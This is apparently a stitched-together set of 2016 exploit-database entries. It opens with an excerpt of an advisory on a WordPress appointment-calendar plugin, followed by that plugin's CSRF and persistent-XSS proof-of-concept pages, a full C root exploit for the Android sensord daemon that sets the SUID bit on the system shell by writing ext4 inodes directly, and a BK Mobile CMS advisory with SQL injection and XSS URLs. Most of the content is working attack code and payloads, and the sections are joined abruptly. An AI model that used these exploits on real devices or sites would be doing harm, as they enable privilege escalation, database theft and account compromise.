if ( ! isset( $_GET['cpabc_calendar_update'] ) || $_GET['cpabc_calendar_update'] != '1' )
return;
$calid = intval(str_replace (CPABC_TDEAPP_CAL_PREFIX, "",$_GET["id"]));
if ( ! current_user_can('edit_pages') && !cpabc_appointments_user_access_to($calid) )
return;
echo "sa";
cpabc_appointments_add_field_verify(CPABC_TDEAPP_CONFIG, 'specialDates');
//@ob_clean();
header("Cache-Control: no-store, no-cache, must-revalidate");
header("Pragma: no-cache");
if ( $user_ID )
$wpdb->query("update ".CPABC_TDEAPP_CONFIG." set specialDates='".$_POST["specialDates"]."',".CPABC_TDEAPP_CONFIG_WORKINGDATES."='"
.$_POST["workingDates"]."',".CPABC_TDEAPP_CONFIG_RESTRICTEDDATES."='".$_POST["restrictedDates"]."',".CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES0.
"='".$_POST["timeWorkingDates0"]."',".CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES1."='".$_POST["timeWorkingDates1"]."',".
CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES2."='".$_POST["timeWorkingDates2"]."',".CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES3."='"
.$_POST["timeWorkingDates3"]."',".CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES4."='".$_POST["timeWorkingDates4"]."',"
.CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES5."='".$_POST["timeWorkingDates5"]."',".CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES6
."='".$_POST["timeWorkingDates6"]."' where ".CPABC_TDEAPP_CONFIG_ID."=".$calid);
exit();
}
===========
Note:
cpabc_appointments_calendar_update2() function is vulnerable too by the same exploit explaned here.
==========
CREDITS
==========
Vulnerability discovered by:
Joaquin Ramirez Martinez [i0 security-lab]
strparser[at]gmail[dot]com
https://www.facebook.com/I0-security-lab-524954460988147/
https://www.youtube.com/channel/UCe1Ex2Y0wD71I_cet-Wsu7Q
========
TIMELINE
========
2016-01-08 vulnerability discovered
2016-01-24 reported to vendor
2016-01-27 released plugin version 1.1.25
2016-01-28 public disclousure
# Exploit Title: WordPress appointment-booking-calendar <=1.1.24 - Privilege escalation (Managing calendars) & Persistent XSS
# Date: 2016-01-28
# Google Dork: Index of /wordpress/wp-content/plugins/appointment-booking-calendar/
# Exploit Author: Joaquin Ramirez Martinez [ i0 security-lab]
# Software Link: http://wordpress.dwbooster.com/calendars/booking-calendar-contact-form
# Vendor: CodePeople.net
# Vebdor URI: http://codepeople.net
# Version: 1.1.24
# Tested on: windows 10 + firefox + sqlmap 1.0.
===================
PRODUCT DESCRIPTION
===================
"Appointment Booking Calendar is a plugin for **accepting online bookings** from a set of **available time-slots in
a calendar**. The booking form is linked to a **PayPal** payment process.
You can use it to accept bookings for medical consultation, classrooms, events, transportation and other activities
where a specific time from a defined set must be selected, allowing you to define the maximum number of bookings
that can be accepted for each time-slot."
(copy of readme file)
======================
EXPLOITATION TECHNIQUE
======================
remote
==============
SEVERITY LEVEL
==============
medium
================================
TECHNICAL DETAILS && DESCRIPTION
================================
Multiple privilege escalation were found in appointment-booking-calendar plugin that allows remote low level
and unauthenticated users to update calendar owners and options (allowing persistent XSS).
================
PROOF OF CONCEPT
================
Changing all appointment tables with UTF-8 charset, injecting persistent XSS into ´ict´ and ´ics´ options and setting
´CPABC_APPOINTMENTS_LOAD_SCRIPTS´ option to value ´1´.
<html>
<!-- CSRF PoC - generated by Burp Suite i0 SecLab plugin -->
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("GET", "http://localhost:80/wordpress/wp-admin/admin.php?page=cpabc_appointments&ac=st&chs=UTF-8&ict=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&ics=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&scr=1", true);
xhr.send();
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
Updating calendar with id 1 and setting name with persistent XSS (if the shortcode [CPABC_APPOINTMENT_CALENDAR calendar="1"]
is added in a post, the injected XSS will appear, in administration page appear too).
<html>
<!-- CSRF PoC - generated by Burp Suite i0 SecLab plugin -->
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("GET", "http://localhost:80/wordpress/wp-admin/admin.php?page=cpabc_appointments&u=1&owner=5&name=%3C%2Foption%3E%3C%2Fselect%3E%3Cimg+src%3Dx+onerror%3Dalert%28%2Fjoaquin%2F%29%3E%3C", true);
xhr.send();
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
==========
CREDITS
==========
Vulnerability discovered by:
Joaquin Ramirez Martinez [i0 security-lab]
joaquin.ramirez.mtz.lab[at]yandex[dot]com
https://www.facebook.com/I0-security-lab-524954460988147/
https://www.youtube.com/user/strparser_lk
========
TIMELINE
========
2016-01-08 vulnerability discovered
2016-01-24 reported to vendor
/*
* Android sensord 0day root exploit by s0m3b0dy
* tested on LG L7 (PL)
*
*
* need pentests? s0m3b0dy1(at)gmail.com
*
* * * * * * * * * * * * * * * * * * * * * * * *
*
* some Android devices have sensord deamon,
* for some ROMs the deamon is running as root process(there we can use this exploit)
*
* and
*---------
* root@android:/ # strace sensord
* ...
* open("/data/misc/sensor/fifo_cmd", O_RDWR|O_LARGEFILE) = 12
* ...
* open("/data/misc/sensor/fifo_dat", O_RDWR|O_LARGEFILE) = 13
* fchmod(12, 0666) = 0
* fchmod(13, 0666) = 0
* ---------
* there is no check that the files are not links, so we can link it to eg. block device and make it rw!
* exploit will set bit suid on /system/bin/mksh, need to reboot the device after step 1 and step 2
*
* this exploit is dangerous, before step 1 exploit is disabling auto-rotate to not overwrite /system pertition!
*
* the author is not responsible for any damage
* for education purpose only :)
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <dirent.h>
#include <ctype.h>
#define FIFO_DAT "/data/misc/sensor/fifo_dat"
#define SH "/system/bin/mksh"
struct ext4_super_block {
/*00*/ __le32 s_inodes_count;
__le32 s_blocks_count_lo;
__le32 s_r_blocks_count_lo;
__le32 s_free_blocks_count_lo;
/*10*/ __le32 s_free_inodes_count;
__le32 s_first_data_block;
__le32 s_log_block_size;
__le32 s_log_cluster_size;
/*20*/ __le32 s_blocks_per_group;
__le32 s_clusters_per_group;
__le32 s_inodes_per_group;
__le32 s_mtime;
/*30*/ __le32 s_wtime;
__le16 s_mnt_count;
__le16 s_max_mnt_count;
__le16 s_magic;
__le16 s_state;
__le16 s_errors;
__le16 s_minor_rev_level;
/*40*/ __le32 s_lastcheck;
__le32 s_checkinterval;
__le32 s_creator_os;
__le32 s_rev_level;
/*50*/ __le16 s_def_resuid;
__le16 s_def_resgid;
__le32 s_first_ino;
__le16 s_inode_size;
__le16 s_block_group_nr;
__le32 s_feature_compat;
/*60*/ __le32 s_feature_incompat;
__le32 s_feature_ro_compat;
/*68*/ __u8 s_uuid[16];
/*78*/ char s_volume_name[16];
/*88*/ char s_last_mounted[64];
/*C8*/ __le32 s_algorithm_usage_bitmap;
__u8 s_prealloc_blocks;
__u8 s_prealloc_dir_blocks;
__le16 s_reserved_gdt_blocks;
/*D0*/ __u8 s_journal_uuid[16];
/*E0*/ __le32 s_journal_inum;
__le32 s_journal_dev;
__le32 s_last_orphan;
__le32 s_hash_seed[4];
__u8 s_def_hash_version;
__u8 s_jnl_backup_type;
__le16 s_desc_size;
/*100*/ __le32 s_default_mount_opts;
__le32 s_first_meta_bg;
__le32 s_mkfs_time;
__le32 s_jnl_blocks[17];
/*150*/ __le32 s_blocks_count_hi;
__le32 s_r_blocks_count_hi;
__le32 s_free_blocks_count_hi;
__le16 s_min_extra_isize;
__le16 s_want_extra_isize;
__le32 s_flags;
__le16 s_raid_stride;
__le16 s_mmp_update_interval;
__le64 s_mmp_block;
__le32 s_raid_stripe_width;
__u8 s_log_groups_per_flex;
__u8 s_checksum_type;
__u8 s_encryption_level;
__u8 s_reserved_pad;
__le64 s_kbytes_written;
__le32 s_snapshot_inum;
__le32 s_snapshot_id;
__le64 s_snapshot_r_blocks_count;
__le32 s_snapshot_list;
#define EXT4_S_ERR_START offsetof(struct ext4_super_block, s_error_count)
__le32 s_error_count;
__le32 s_first_error_time;
__le32 s_first_error_ino;
__le64 s_first_error_block;
__u8 s_first_error_func[32];
__le32 s_first_error_line;
__le32 s_last_error_time;
__le32 s_last_error_ino;
__le32 s_last_error_line;
__le64 s_last_error_block;
__u8 s_last_error_func[32];
#define EXT4_S_ERR_END offsetof(struct ext4_super_block, s_mount_opts)
__u8 s_mount_opts[64];
__le32 s_usr_quota_inum;
__le32 s_grp_quota_inum;
__le32 s_overhead_clusters;
__le32 s_backup_bgs[2];
__u8 s_encrypt_algos[4];
__u8 s_encrypt_pw_salt[16];
__le32 s_lpf_ino;
__le32 s_prj_quota_inum;
__le32 s_checksum_seed;
__le32 s_reserved[98];
__le32 s_checksum;
};
struct ext4_group_desc
{
__le32 bg_block_bitmap_lo;
__le32 bg_inode_bitmap_lo;
__le32 bg_inode_table_lo;
__le16 bg_free_blocks_count_lo;
__le16 bg_free_inodes_count_lo;
__le16 bg_used_dirs_count_lo;
__le16 bg_flags;
__le32 bg_exclude_bitmap_lo;
__le16 bg_block_bitmap_csum_lo;
__le16 bg_inode_bitmap_csum_lo;
__le16 bg_itable_unused_lo;
__le16 bg_checksum;
__le32 bg_block_bitmap_hi;
__le32 bg_inode_bitmap_hi;
__le32 bg_inode_table_hi;
__le16 bg_free_blocks_count_hi;
__le16 bg_free_inodes_count_hi;
__le16 bg_used_dirs_count_hi;
__le16 bg_itable_unused_hi;
__le32 bg_exclude_bitmap_hi;
__le16 bg_block_bitmap_csum_hi;
__le16 bg_inode_bitmap_csum_hi;
__u32 bg_reserved;
};
struct ext4_inode {
__le16 i_mode;
__le16 i_uid;
__le32 i_size_lo;
__le32 i_atime;
__le32 i_ctime;
__le32 i_mtime;
__le32 i_dtime;
__le16 i_gid;
__le16 i_links_count;
__le32 i_blocks_lo;
__le32 i_flags;
union {
struct {
__le32 l_i_version;
} linux1;
struct {
__u32 h_i_translator;
} hurd1;
struct {
__u32 m_i_reserved1;
} masix1;
} osd1;
__le32 i_block[15];
__le32 i_generation;
__le32 i_file_acl_lo;
__le32 i_size_high;
__le32 i_obso_faddr;
union {
struct {
__le16 l_i_blocks_high;
__le16 l_i_file_acl_high;
__le16 l_i_uid_high;
__le16 l_i_gid_high;
__le16 l_i_checksum_lo;
__le16 l_i_reserved;
} linux2;
struct {
__le16 h_i_reserved1;
__u16 h_i_mode_high;
__u16 h_i_uid_high;
__u16 h_i_gid_high;
__u32 h_i_author;
} hurd2;
struct {
__le16 h_i_reserved1;
__le16 m_i_file_acl_high;
__u32 m_i_reserved2[2];
} masix2;
} osd2;
__le16 i_extra_isize;
__le16 i_checksum_hi;
__le32 i_ctime_extra;
__le32 i_mtime_extra;
__le32 i_atime_extra;
__le32 i_crtime;
__le32 i_crtime_extra;
__le32 i_version_hi;
};
void print_usage( char ** argv)
{
printf("Have 3 steps. You need to reboot the device after step 1 and step 2.\n");
printf("Usage: %s 1\n", argv[0]);
printf(" %s 2\n", argv[0]);
printf(" %s 3\n", argv[0]);
printf(" %s verify\n", argv[0]);
}
void get_system_dev( char *ptr, int size )
{
int fd = open("/proc/mounts", O_RDONLY);
int pos = 0, posend = 0, tmppos = 0;
char buff[4096];
char link[1024];
memset(buff, 0, sizeof(buff));
memset(link, 0, sizeof(link));
memset(ptr, 0, size);
if(fd != -1)
{
read(fd, &buff, sizeof(buff));
int sres = (int)strstr(buff, " /system ");
if( (sres != -1) && ((pos = (sres - (int)buff)) > 0) )
{
tmppos = pos;
int i=0;
while( (buff[pos] != '\n') && (pos > 0) ) pos--;
pos++;
strncpy(link, &buff[pos], tmppos - pos);
readlink(link, ptr, size);
}
else
{
printf("[-] Can't find system partition!\n");
close(fd);
exit(0);
}
close(fd);
}
else
{
printf("[-] Can't read /proc/mounts file!\n");
exit(0);
}
}
void first_step()
{
if( access(FIFO_DAT, F_OK) != -1 )
{
unlink(FIFO_DAT);
}
char path[1024];
get_system_dev(path, sizeof(path));
symlink(path, FIFO_DAT);
printf("[+] Symlink is created, please reboot device and run second step.\n[+] The device may slow down, after second step will work normally.\n");
}
void second_step()
{
char path[1024];
struct stat s;
unlink(FIFO_DAT);
stat(SH, &s);
printf("[+] Looking for inode no.: %llu\n", s.st_ino);
get_system_dev(path, sizeof(path));
int fd = open(path, O_RDWR);
if( fd != -1 )
{
int inodeno = s.st_ino;
struct ext4_super_block super;
struct ext4_group_desc group_descr;
struct ext4_inode inode;
unsigned long int offset=0;
lseek(fd, 0x400, SEEK_SET);
read(fd, &super, sizeof(super));
int block_size = 1024 << super.s_log_block_size;
int bg = (inodeno-1) /super.s_inodes_per_group;
lseek(fd, block_size + bg * (super.s_desc_size ? super.s_desc_size : sizeof(struct ext4_group_desc) ), SEEK_SET);
read(fd, &group_descr, sizeof(group_descr));
unsigned int index = (inodeno-1) % super.s_inodes_per_group;
unsigned int off = index * super.s_inode_size;
unsigned long total_offset = block_size + (group_descr.bg_inode_table_lo-1) * block_size + off;
lseek(fd, total_offset, SEEK_SET);
read(fd, &inode, sizeof(struct ext4_inode));
if(inode.i_size_lo == s.st_size) {
__le16 mode = 0;
printf("[+] Found inode!\n");
lseek(fd, total_offset, SEEK_SET);
inode.i_mode = inode.i_mode | 0x800;
int modesize = sizeof(inode.i_mode);
int wr = write(fd, &inode.i_mode, modesize);
if( wr == modesize )
{
printf("[+] Success, bit SUID is setted on %s\n[+] You must reboot the device to run third step\n", SH);
}
else
{
printf("[-] Can't set bit SUID on %s\n", SH);
}
}
else
{
printf("[-] Can't find inode!\n");
}
close(fd);
}
else
printf("[-] Can't open %s!\n", path);
}
void third_step()
{
char path[1024];
//chmod(SH, 4755);
setuid(0);
setgid(0);
if(getuid() == 0)
{
get_system_dev(path, sizeof(path));
chmod(path, 0600);
printf("[+] Rooted!\n");
system(SH);
}
else
{
printf("[-] No root here!\n");
exit(0);
}
}
bool isSensord(char *spath)
{
char buff[50];
bool res = false;
int fd = open(spath, O_RDONLY);
if(fd != -1)
{
read(fd, buff, 50);
if(strstr(buff, "/system/bin/sensord") != NULL)
{
res = true;
}
close(fd);
}
return res;
}
bool verify()
{
DIR* dir;
struct dirent *entry;
char spath[512];
bool res = false;
struct stat s;
dir = opendir("/proc");
if(dir) {
while ((entry = readdir(dir)) != NULL) {
if (entry->d_type == DT_DIR) {
snprintf(spath, 512, "/proc/%s/cmdline", entry->d_name);
if (isSensord(spath)) {
stat(spath, &s);
if (s.st_uid == 0)
res = true;
break;
}
}
}
closedir(dir);
}
return res;
}
void disable_autorotate()
{
printf("[+] Disabling auto-rotate...\n");
system("content insert --uri content://settings/system --bind name:s:accelerometer_rotation --bind value:i:0");
}
int main(int argc, char **argv)
{
if(argc != 2)
{
print_usage( argv );
return 0;
}
if( strstr( argv[1], "1" ) != NULL) {
if( verify() ) {
disable_autorotate();
first_step(); //create link
}
else
{
printf("[-] It looks likey is not vulnerable!\n");
}
}
else if( strstr( argv[1], "2") != NULL) {
second_step(); //edit ext4(/system) partition(set bit suid)
}
else if( strstr( argv[1], "3") != NULL) {
third_step(); //get root shell
}
else if( strstr( argv[1], "verify") != NULL){
if( verify() )
printf("[+] Should be vulnerable!\n");
else
printf("[-] Not vulnerable!\n");
}
else{
print_usage( argv );
}
return 0;
}
#Product : BK Mobile CMS
#Exploit Author : Rahul Pratap Singh
#Version : 2.4
#Home page Link :
http://codecanyon.net/item/jquery-mobile-website-with-full-admin-panel/2441358
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 27/Jan/2016
SQLi Vulnerability:
----------------------------------------
Description:
----------------------------------------
"g_name" parameter is not sanitized that leads to SQL Injection.
----------------------------------------
Vulnerable Code:
----------------------------------------
file: gallery1.php
line 5
$get_g_name = $_GET['g_name'];
$query_photos = "SELECT * FROM ".$get_prefix."photos WHERE
gallery_name='".$get_g_name."' ORDER BY id DESC";
----------------------------------------
Exploit:
----------------------------------------
http://localhost/BKMobile%20CMS/user/gallery1.php?g_name=1%27%20union%20all%20select%201,2,3,group_concat%28version%28%29%29,5--+
----------------------------------------
POC:
----------------------------------------
https://0x62626262.files.wordpress.com/2016/01/bk-mobile-templatesqlipoc.png
XSS Vulnerability:
----------------------------------------
Description:
----------------------------------------
"g_name" parameter is not sanitized that leads to reflected XSS.
----------------------------------------
Vulnerable Code:
----------------------------------------
file: gallery1.php
line 81-88
<div data-role="page" id="<?php echo $get_g_name; ?>" class="jqm-demos"
<?php echo $custom_bg_active; ?>>
<?php include("../header.php"); ?>
<div role="main" class="ui-content">
<div class="jqm-block-content">
<h3><?php echo $_GET['g_name']; ?></h3>
----------------------------------------
Exploit:
----------------------------------------
http://localhost/BKMobile%20CMS/user/gallery1.php?g_name=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E
----------------------------------------
POC:
----------------------------------------
https://0x62626262.files.wordpress.com/2016/01/bk-mobile-templatexsspoc.png
Fix:
Update to 2.5
Vulnerability Disclosure Timeline:
→ January 14, 2015 – Bug discovered, initial report to Vendor
→ January 14, 2015 – Vendor acknowledged
→ January 19, 2015 – Vendor Deployed a Patch
#######################################
# CTG SECURITY SOLUTIONS #
# www.ctgsecuritysolutions.com #
#######################################
Pub Ref:
https://0x62626262.wordpress.com/2016/01/27/bk-mobile-cms-sqli-and-xss-vulnerability
http://codecanyon.net/item/jquery-mobile-website-with-full-admin-panel/2441358
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.